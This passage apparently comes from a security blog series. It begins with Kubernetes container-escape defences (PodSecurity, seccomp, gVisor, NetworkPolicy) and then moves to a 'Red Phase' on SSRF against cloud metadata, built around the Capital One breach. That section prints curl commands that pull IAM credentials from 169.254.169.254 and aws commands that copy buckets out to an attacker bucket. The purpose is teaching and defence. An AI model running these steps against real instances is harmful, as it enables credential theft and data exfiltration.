          drop: ["ALL"]            # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
          add: []                  # Restricted permits adding back only NET_BIND_SERVICE
        readOnlyRootFilesystem: true  # not required by Restricted; reduces attacker persistence options
      volumeMounts:
        - name: app-data
          mountPath: /data
  volumes:                 # hostPath volumes blocked
    - name: app-data
      emptyDir: {}         # emptyDir, configMap, secret allowed; hostPath not
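Before labeling a namespace, a rough local check can catch the obvious failures. This is a partial, hypothetical checker covering only the controls discussed in this section; it is not the admission controller, and the server-side dry run remains the source of truth.

```python
# Minimal sketch: check a pod spec (as a dict) against the subset of Pod
# Security Standards controls discussed here. NOT the real admission logic:
# it ignores the Restricted volume-type allowlist, runAsUser=0, sysctls,
# host ports, and AppArmor/SELinux options.
from typing import List


def restricted_violations(spec: dict) -> List[str]:
    problems = []
    for field in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(field):
            problems.append(f"{field} must be false")
    if any("hostPath" in v for v in spec.get("volumes") or []):
        problems.append("hostPath volumes are not allowed")
    pod_sc = spec.get("securityContext") or {}
    for c in (spec.get("initContainers") or []) + (spec.get("containers") or []):
        sc = c.get("securityContext") or {}
        name = c.get("name", "?")
        if sc.get("privileged"):
            problems.append(f"{name}: privileged must be false")
        if sc.get("allowPrivilegeEscalation") is not False:
            problems.append(f"{name}: allowPrivilegeEscalation must be false")
        caps = sc.get("capabilities") or {}
        if "ALL" not in (caps.get("drop") or []):
            problems.append(f"{name}: capabilities.drop must include ALL")
        extra = set(caps.get("add") or []) - {"NET_BIND_SERVICE"}
        if extra:
            problems.append(f"{name}: may only add NET_BIND_SERVICE, got {sorted(extra)}")
        # Container-level runAsNonRoot overrides the pod-level value.
        if sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot")) is not True:
            problems.append(f"{name}: runAsNonRoot must be true")
        seccomp = (sc.get("seccompProfile") or pod_sc.get("seccompProfile") or {}).get("type")
        if seccomp not in ("RuntimeDefault", "Localhost"):
            problems.append(f"{name}: seccompProfile must be RuntimeDefault or Localhost")
    return problems
```

An empty list means the spec clears these particular checks, not that admission will accept it.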

Rollout approach for existing clusters:

Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:

# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
  jq -r '.items[] |
    select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
    .metadata.name' | \
  while read -r ns; do
    kubectl label namespace "$ns" \
      pod-security.kubernetes.io/warn=restricted \
      pod-security.kubernetes.io/warn-version=latest \
      --overwrite
    echo "Labeled $ns"
  done

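# Preview enforce mode: a server-side dry run evaluates existing pods
# and prints a warning for each one that Restricted would reject
kubectl label --dry-run=server --overwrite ns --all \
  pod-security.kubernetes.io/enforce=restricted

# After enforcing, controllers that can no longer create pods emit FailedCreate events
kubectl get events -A --field-selector reason=FailedCreate \
  -o json | jq -r '.items[] | select(.message | contains("violates PodSecurity")) | .message'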

Fix 2: Sandboxed RuntimeClass for Untrusted Workloads

For workloads you do not trust (user-supplied code, third-party images, multi-tenant jobs), add a stronger isolation boundary: a sandboxed runtime. This is not an option for agents that need host access by design, such as CNI plugins or node monitoring DaemonSets.

gVisor runs a user-space kernel (the Sentry) that services the container’s system calls; Kata Containers runs each pod in a lightweight VM with its own guest kernel. Either way, a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.

# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc   # must match the handler name in containerd/crio config
scheduling:
  nodeSelector:
    runtime.gvisor: "true"   # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
  name: untrusted-workload
spec:
  runtimeClassName: gvisor   # all syscalls go through gVisor's sentry
  containers:
    - name: app
      image: untrusted-image:latest

# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: kata-containers
handler: kata-qemu

For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.

Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape

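Even without gVisor, a custom seccomp allowlist closes the primary escape syscall surface. Anything not listed fails with EPERM, so mount, umount2, unshare, setns (what nsenter calls), pivot_root, ptrace, and bpf are denied by omission, and clone is allowed only when none of the new-namespace flags are set. clone3 returns ENOSYS so that glibc falls back to the filtered clone. Treat the list as a starting point: trace your workload with strace -c -f and extend it.

{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
  "syscalls": [
    {
      "names": [
        "accept", "accept4", "access", "arch_prctl",
        "bind", "brk", "capget", "capset",
        "chdir", "chmod", "chown", "clock_gettime",
        "clock_nanosleep", "close", "close_range", "connect",
        "dup", "dup2", "dup3",
        "epoll_create1", "epoll_ctl", "epoll_pwait", "epoll_wait",
        "execve", "exit", "exit_group",
        "fchdir", "fchmod", "fchown", "fcntl",
        "fstat", "fstatfs", "fsync",
        "futex", "getcwd", "getdents64",
        "getegid", "geteuid", "getgid", "getgroups",
        "getpeername", "getpid", "getppid", "getrandom",
        "getrlimit", "getsockname", "getsockopt",
        "gettid", "gettimeofday", "getuid",
        "inotify_add_watch", "inotify_init1", "ioctl",
        "kill", "listen", "lseek", "lstat",
        "madvise", "mkdir", "mkdirat", "mmap", "mprotect",
        "munmap", "nanosleep", "newfstatat",
        "open", "openat",
        "pipe", "pipe2", "poll", "ppoll",
        "prctl", "pread64", "prlimit64", "pwrite64",
        "read", "readlink", "readv",
        "recvfrom", "recvmsg", "recvmmsg",
        "rename", "rseq", "rt_sigaction", "rt_sigprocmask",
        "rt_sigreturn", "sched_getaffinity", "sched_yield",
        "select", "sendfile", "sendmsg", "sendto",
        "set_robust_list", "set_tid_address",
        "setgid", "setgroups", "setuid",
        "setsockopt", "shutdown", "sigaltstack",
        "socket", "socketpair",
        "stat", "statfs", "statx", "symlink",
        "tgkill", "time", "timerfd_create",
        "timerfd_settime", "truncate",
        "umask", "uname", "unlink", "unlinkat",
        "wait4", "waitid",
        "write", "writev"
      ],
      "action": "SCMP_ACT_ALLOW"
    },
    {
      "names": ["clone"],
      "action": "SCMP_ACT_ALLOW",
      "args": [
        {"index": 0, "value": 2114060288, "valueTwo": 0, "op": "SCMP_CMP_MASKED_EQ"}
      ]
    },
    {
      "names": ["clone3"],
      "action": "SCMP_ACT_ERRNO",
      "errnoRet": 38
    }
  ]
}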

Apply via pod spec:

spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: "container-escape-block.json"
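      # Path is relative to the kubelet seccomp root: /var/lib/kubelet/seccomp/ on each node

# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault, which blocks around 44 of 300+ syscalls
# per Docker's documentation of its default profile)

# RuntimeDefault blocks add_key, keyctl, request_key, and pivot_root outright.
# mount, umount2, unshare, setns, and clone with new-namespace flags are blocked
# unless the container holds CAP_SYS_ADMIN, so pair it with drop: ["ALL"].
# Adequate for most workloads.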
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault
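The "clone with new-namespace flags" rule is an argument filter, not a blanket block: Docker's default seccomp profile allows clone only when none of the namespace flags are set, expressed as an SCMP_CMP_MASKED_EQ comparison with the constant 2114060288. The arithmetic behind that constant, sketched in Python with flag values taken from the kernel's include/uapi/linux/sched.h; `clone_allowed` is an illustrative name.

```python
# Minimal sketch of the clone(2) argument filter: allowed only if
# (flags & NS_FLAGS) == 0, i.e. SCMP_CMP_MASKED_EQ with value NS_FLAGS and
# valueTwo 0. Flag values are from include/uapi/linux/sched.h.
CLONE_NEWNS = 0x00020000
CLONE_NEWCGROUP = 0x02000000
CLONE_NEWUTS = 0x04000000
CLONE_NEWIPC = 0x08000000
CLONE_NEWUSER = 0x10000000
CLONE_NEWPID = 0x20000000
CLONE_NEWNET = 0x40000000

NS_FLAGS = (CLONE_NEWNS | CLONE_NEWCGROUP | CLONE_NEWUTS | CLONE_NEWIPC
            | CLONE_NEWUSER | CLONE_NEWPID | CLONE_NEWNET)

# Flags of the kind pthread_create passes: no namespace bits set.
CLONE_VM, CLONE_FS, CLONE_FILES, CLONE_SIGHAND, CLONE_THREAD = (
    0x100, 0x200, 0x400, 0x800, 0x10000)


def clone_allowed(flags: int) -> bool:
    """Mirror the masked comparison: no new-namespace flag may be set."""
    return (flags & NS_FLAGS) == 0


if __name__ == "__main__":
    print(NS_FLAGS, hex(NS_FLAGS))
```

Thread creation passes the filter; any call that asks for a new mount, PID, network, user, UTS, IPC, or cgroup namespace is rejected before it reaches the kernel's clone implementation.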

Fix 4: Network Policy — Contain the Blast Radius After Escape

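NetworkPolicy limits what a compromised pod can reach before it escapes, including the Kubernetes API server and the cloud metadata endpoint. It stops applying once the attacker runs in the node’s own network namespace (after nsenter, or in a hostNetwork pod), so containing a fully escaped process needs node-level controls such as Cilium host policies, Calico host endpoint policies, or cloud security groups.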

# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-api-server-egress
  namespace: production
spec:
  podSelector: {}       # applies to all pods in namespace
  policyTypes:
    - Egress
  egress:
    # Allow DNS
    - ports:
        - protocol: UDP
          port: 53
    # Allow application traffic (customize per workload)
    - to:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: production
    # Explicitly: no rule allowing egress to control plane CIDR
    # This is a deny-by-absence: egress to the control plane falls through to default deny

# Also deny everything not explicitly allowed, so a compromised pod
# cannot pivot to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
  # No ingress or egress rules = deny all
  # NetworkPolicies are additive: allow rules live in other policies
  # (like the one above) and are unioned with this one
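Deny-by-absence only holds until someone adds a broad ipBlock for internet egress. A quick check, sketched with Python's standard ipaddress module, is whether any allowed CIDR (minus its except list) still contains an API server address. The blocks mirror ipBlock.cidr and ipBlock.except; the addresses are hypothetical, and the endpoint IPs from kubectl get endpoints kubernetes are usually the ones to test, since many CNIs evaluate policy after the Service IP is translated.

```python
# Minimal sketch: does an egress allowlist of NetworkPolicy ipBlocks still
# reach a given address? Each block is (cidr, [except cidrs]).
import ipaddress
from typing import Iterable, Sequence, Tuple

IpBlock = Tuple[str, Sequence[str]]


def reachable(ip: str, blocks: Iterable[IpBlock]) -> bool:
    addr = ipaddress.ip_address(ip)
    for cidr, excepts in blocks:
        if addr in ipaddress.ip_network(cidr) and not any(
            addr in ipaddress.ip_network(e) for e in excepts
        ):
            return True
    return False
```

For example, an internet-egress block of 0.0.0.0/0 that excepts only 10.0.1.0/24 still reaches an API server endpoint at 10.0.0.10; excepting 10.0.0.0/8 closes it.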

Fix 5: Node Isolation — Co-location Risk

An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.

# Use node selectors, taints, and tolerations to separate workload tiers

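# Label nodes so nodeSelector can target each tier
kubectl label nodes sensitive-node-1 workload-tier=sensitive
kubectl label nodes public-node-1 workload-tier=public

# Taint sensitive nodes so only pods that tolerate the taint schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule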

# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes

# Pod spec for internet-facing workload — only schedules on public nodes
spec:
  nodeSelector:
    workload-tier: public
  tolerations: []   # No toleration for sensitive node taint

# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
  nodeSelector:
    workload-tier: sensitive
  tolerations:
    - key: workload-tier
      operator: Equal
      value: sensitive
      effect: NoSchedule
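The two pod specs above depend on two separate scheduler checks: a nodeSelector only matches nodes that carry the label, and a NoSchedule taint only admits pods that tolerate it. A toleration does not attract a pod to the tainted node; the nodeSelector does that. The following is a toy bash model of just those two checks, under a simplified encoding that is an assumption of this sketch (space-separated key=value lists, Equal-operator tolerations only, no affinity or resource checks). It is not how kube-scheduler is implemented.

```bash
#!/usr/bin/env bash
# Toy model of two kube-scheduler filters: nodeSelector matching and
# NoSchedule taint toleration. Arguments are space-separated key=value lists
# (a simplified, hypothetical encoding; Equal-operator tolerations only).
#   can_schedule "<node labels>" "<node NoSchedule taints>" \
#                "<pod nodeSelector>" "<pod tolerations>"
can_schedule() {
  local -a labels taints selector tolerations
  local want have found
  read -r -a labels <<< "$1"
  read -r -a taints <<< "$2"
  read -r -a selector <<< "$3"
  read -r -a tolerations <<< "$4"

  # Every nodeSelector pair must appear among the node's labels.
  for want in "${selector[@]}"; do
    found=0
    for have in "${labels[@]}"; do
      [[ $have == "$want" ]] && found=1
    done
    (( found )) || return 1
  done

  # Every NoSchedule taint on the node must be matched by a toleration.
  for want in "${taints[@]}"; do
    found=0
    for have in "${tolerations[@]}"; do
      [[ $have == "$want" ]] && found=1
    done
    (( found )) || return 1
  done
  return 0
}
```

For example, the internet-facing pod (nodeSelector workload-tier=public, no tolerations) fails against sensitive-node-1, while the sensitive-tier pod passes both checks. A pod with only a toleration and no nodeSelector can still land on any untainted node, which is why both specs set a nodeSelector.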

⚠ Production Gotchas

Legitimate workloads that require --privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of the Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; run infrastructure DaemonSets in a dedicated namespace at the Privileged level (Baseline still forbids privileged containers, hostPID, hostNetwork, and hostPath), and compensate with Falco detection and node isolation.

Seccomp under Restricted blocks some monitoring agents. The Restricted profile requires a seccomp profile (RuntimeDefault or Localhost), and the container runtime's RuntimeDefault profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Allow these in a custom Localhost seccomp profile rather than running the agent with no profile at all.
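To turn the strace capture into a concrete allowlist decision, the summary table can be reduced to syscall names and checked against the culprits named above. A minimal sketch, assuming the summary was written with strace -f -c -o FILE (the standard summary table whose last column is the syscall name) and treating perf_event_open, ptrace, and bpf as the syscalls to watch; whether RuntimeDefault actually blocks each one depends on your container runtime version and the container's capabilities.

```bash
#!/usr/bin/env bash
# Reduce an `strace -c` summary table to the syscall names it lists.
# Reads the file(s) given as arguments, or stdin.
syscalls_from_strace_summary() {
  # Data rows end with the syscall name; skip the header ("syscall"),
  # the dashed separator lines, and the final "total" row.
  awk '$NF ~ /^[a-z0-9_]+$/ && $NF != "syscall" && $NF != "total" { print $NF }' "$@"
}

# Print the syscalls from the summary that are likely to need an explicit
# allow in a custom Localhost seccomp profile (list taken from the text above).
flag_seccomp_culprits() {
  syscalls_from_strace_summary "$@" | grep -xE 'perf_event_open|ptrace|bpf' || true
}
```

Usage: strace -f -c -o /tmp/agent-syscalls.txt ./your-agent, then flag_seccomp_culprits /tmp/agent-syscalls.txt. An empty result means none of the listed syscalls showed up during the capture, which is only as good as the code paths the agent exercised while traced.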

runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.

hostPath volumes are a partial equivalent to --privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. Both the Baseline and Restricted PodSecurity levels forbid hostPath volumes; only the Privileged level (or a namespace with no enforcement) allows them. Audit for hostPath volumes separately from --privileged.
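Auditing hostPath separately can start from a flat listing of every pod's hostPath mounts. A minimal sketch, assuming tab-separated input lines of namespace, pod name, and space-separated hostPath paths (the shape produced by the kubectl jsonpath query in the usage note); the list of sensitive paths is an illustrative assumption, not an authoritative inventory.

```bash
#!/usr/bin/env bash
# Flag pods whose hostPath volumes expose sensitive node paths.
# Input (stdin): "namespace<TAB>pod<TAB>path1 path2 ..." per line.

# Illustrative, non-exhaustive list of sensitive node paths.
SENSITIVE_HOST_PATHS=(/etc /root /dev /var/lib/kubelet /run/containerd /var/run/docker.sock)

# True if the path is "/" itself, one of the sensitive paths, or below one.
is_sensitive_host_path() {
  local path=$1 prefix
  [[ $path == / ]] && return 0
  for prefix in "${SENSITIVE_HOST_PATHS[@]}"; do
    [[ $path == "$prefix" || $path == "$prefix"/* ]] && return 0
  done
  return 1
}

flag_hostpath_pods() {
  local ns pod paths path
  local -a path_list
  while IFS=$'\t' read -r ns pod paths; do
    [[ -n $paths ]] || continue            # pod has no hostPath volumes
    read -r -a path_list <<< "$paths"      # split on default IFS (spaces)
    for path in "${path_list[@]}"; do
      if is_sensitive_host_path "$path"; then
        printf '%s/%s\t%s\n' "$ns" "$pod" "$path"
      fi
    done
  done
}
```

Usage: kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"\t"}{.metadata.name}{"\t"}{.spec.volumes[*].hostPath.path}{"\n"}{end}' | flag_hostpath_pods. Each output line names a pod and the sensitive path it mounts; infrastructure DaemonSets will show up too and need a deliberate exception rather than silence.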

RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s Sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility. For applications that do high-volume filesystem I/O (databases, high-throughput queues), check it and benchmark as well: the overhead may be unacceptable even when every syscall is supported.


Quick Reference

| Escape Path | Precondition | Detection Signal | Structural Fix |
|---|---|---|---|
| Privileged container → mount | privileged: true | Falco: mount syscall from container; Tetragon: sys_mount kprobe | PodSecurity Restricted enforce; seccomp blocks mount |
| hostPID + nsenter | hostPID: true | Falco: nsenter exec in container; audit log: pod creation with hostPID | PodSecurity Restricted (blocks hostPID) |
| hostNetwork + IMDS | hostNetwork: true | CloudTrail: node role credentials used from an unexpected source (IMDS requests themselves are not logged) | PodSecurity Restricted (blocks hostNetwork); enforce IMDSv2 (hop limit 1 does not stop a hostNetwork pod, which shares the node's network namespace) |
| runc CVE (CVE-2019-5736) | Unpatched runc | Tetragon: vfs_write to /proc/self/exe | Patch runc/containerd; use RuntimeClass (gVisor) |
| hostPath volume mount | hostPath to sensitive path | Falco: sensitive host file access; PodSecurity audit | PodSecurity Baseline or Restricted (both block hostPath) |
| Escaped → API server | Node credential access | Audit log: API calls from node IP at unexpected time | Network policy blocking node→API server egress |

Key Takeaways

  • Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags
  • Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash — this is not a sophisticated exploit, it is a default kernel behavior
  • eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
  • PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
  • runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
  • Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials

What’s Next

Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.

Get EP09 in your inbox when it publishes → subscribe at linuxcent.com

SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

Reading Time: 15 minutes



TL;DR

  • SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
  • IMDSv1 (the only version before November 2019, and still enabled by default on many instances long after) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials, so SSRF anywhere in the stack is sufficient
  • Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
  • IMDSv2 requires a PUT request (with an X-aws-ec2-metadata-token-ttl-seconds header) to obtain a session token, and every metadata GET must then carry that token in an X-aws-ec2-metadata-token header. Typical SSRF primitives can only make the server issue a GET to an attacker-chosen URL, so they cannot complete this flow; --http-tokens required is the one-line enforcement
  • Hop limit of 1 is the container-layer defense: IMDS sends the token response with an IP TTL equal to the hop limit, so with a limit of 1 the response is dropped when the node forwards it into a container's network namespace, and the container never receives a token
  • The structural fix is eliminating the credential entirely: OIDC workload identity replaces the attached IAM role with a dynamically issued, scoped token, leaving no IMDS credential worth stealing

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.


The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.


The Incident: Capital One (2019)

In March 2019, Capital One was running a misconfigured WAF on AWS EC2. The WAF was a commercial product deployed on an EC2 instance with an attached IAM role: standard practice, and necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. The breach predates IMDSv2: AWS released it in November 2019, four months after the breach was discovered in July 2019, and left IMDSv1 enabled by default so existing workloads kept working. What the breach demonstrated was not a zero-day but a known architectural weakness, present since the metadata service began serving IAM role credentials.

The lesson the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability in software running on the instance (the application, a WAF, a sidecar, an agent) is a straight line to your IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.


Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-23T00:03:30Z"
}

In a real response these are valid AWS temporary credentials (the values above are placeholders). The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid
{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

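# Check what IAM actions are allowed (enumerate permissions)
# --policy-source-arn takes the role ARN, not the assumed-role session ARN,
# and the call succeeds only if the role itself allows iam:SimulatePrincipalPolicy
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:iam::123456789012:role/MyApplicationRole" \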
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
